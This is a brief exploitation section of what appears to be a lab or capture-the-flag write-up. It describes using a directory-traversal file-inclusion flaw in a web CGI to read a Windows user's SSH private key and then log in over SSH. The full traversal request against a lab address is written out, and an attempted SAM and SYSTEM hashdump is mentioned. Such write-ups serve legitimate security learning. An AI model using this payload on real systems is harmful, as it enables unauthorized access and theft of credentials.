Exploitation

I was unable to find the system, the sam, and security files to do a hashdump of them. Regardless I realized that the machine wasnt running SMB so this would have been futile. Moreover I realized that just like Linux, ssh idrsa.pub keys are stored in the folder of the Users/.ssh/id_rsa.pub.

This is something I will keep in mind if i ever encounter LFI on Windows.

I deduced that the name was "Viewer" because of the panel here.

I got the id_rsa and changed the permissions to 400. Just SShed into it.

Request:

http://192.168.105.179:8080/WEBACCOUNT.CGI?OkBtn=++Ok++&RESULTPAGE=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2FUsers%2Fviewer%2F.ssh%2Fid_rsa&USEREDIRECT=1&WEBACCOUNTID=&WEBACCOUNTPASSWORD=